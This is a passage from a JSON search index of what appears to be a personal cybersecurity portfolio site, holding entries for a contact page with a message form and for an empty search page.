mind, a specific technical inquiry, or an employment opportunity, please use the form below to get in touch.\nYour Email Message Send Transmission ","permalink":"https://xblankzgap.github.io/cyber-portfolio/contact/","summary":"Get in Touch If you have a professional project in mind, a specific technical inquiry, or an employment opportunity, please use the form below to get in touch.\nYour Email Message Send Transmission ","tags":[],"categories":[],"tools":[]},{"title":"Search","content":"","permalink":"https://xblankzgap.github.io/cyber-portfolio/search/","summary":"search","tags":[],"categories":[],"tools":[]}]